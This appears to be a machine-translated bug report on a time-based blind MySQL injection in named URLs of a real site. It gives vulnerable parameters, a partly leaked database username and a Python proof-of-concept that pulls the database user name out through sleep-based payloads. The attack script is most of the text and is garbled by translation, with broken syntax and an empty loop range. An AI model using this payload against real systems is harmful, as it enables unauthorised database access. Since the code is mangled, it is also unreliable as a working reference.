Mysql blind note (poc) on a website of alimama)
Mymysqlblind Injection
URL: http://brandbase.mama.cn/yikexin.php? Ctype = * & mod = growth & op = detail & pgcount = 12 & tid = 1520677
POST parameter: page = 20
Problematic parameter ctype:
Sqlmap cannot run this point. It was modified using the lijiejie script and didn't want to build the wheel on its own.
This is because there are two, and the other is the main station. Because of the network environment, the URL cannot be accessed, but I remember that
What does the current user start with hr? The length is 36,
URL: http://www.mama.cn: 80/photo/index. php? A = Search & d = index & g = Search & gotosearch = yes & keyword = * & num = 25 & page = 1 & searchtype = photo
The problematic parameter is keyword,
Poc:
#-*-Coding: UTF-8 -*-#! /Usr/bin/env python # mysql_timebased.pyimport httplibimport urllibheaders = {'user-agent': 'mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) gecko/20100101 Firefox/37.0 '} payloads = 'abcdefghijklmnopqrstuvwxyz1234567890. @ _ * % 'def GetUlength (): # Get the length of the current user userlen = 0 for I in range (): err_count = 0 for j in range (3): try: s1 = "length (user () = % s" % I s = "if (" + s1 + ", sleep (3), 0) /* 'xor (if (1, sleep (3), 0) OR % 22 'Xor (if (1, sleep (3), 0) OR % 22 */"url = '/yikexin. php? Ctype = % s & mod = growth & op = detail & pgcount = 12 & tid = 1520677 '% s body = "page = 20" conn = httplib. HTTPConnection ('brandbase .mama.cn ', timeout = 3) conn. request (method = 'post', headers = headers, url = url, body = urllib. quote (body) conn. getresponse () conn. close () print '*', counter T: err_count + = 1 if err_count = 3: userlen = I break return userlendef GetUser (l ): # Getting the current user name user = ''for I in range (1, l): for payload in pay Loads: err_count = 0 # print payload for j in range (3): try: s1 = "ascii (mid (lower (user (), % s, 1 )) = % s "% (I, ord (payload) s =" if ("+ s1 +", sleep (3), 0)/* 'XOR (if (1, sleep (3), 0) OR % 22 'XOR (if (1, sleep (3), 0) OR % 22 */"url ='/yikexin. php? Ctype = % s & mod = growth & op = detail & pgcount = 12 & tid = 1520677 '% s body = "page = 20" conn = httplib. HTTPConnection ('brandbase .mama.cn ', timeout = 3) conn. request (method = 'post', headers = headers, url = url, body = urllib. quote (body) conn. getresponse () conn. close () print '*', counter T: err_count + = 1 if err_count = 3: user + = payload print '\ n [info]', user break return user def main (): userlen = GetUlength () print "user length: \ n", userlen current_user = GetUser (userlen) print "\ n CurrentUser is :", current_userif _ name _ = '_ main _': print 'mysql-timebased-sqlinjection: \ n' main ()
Solution:
Filtering and structured SQL query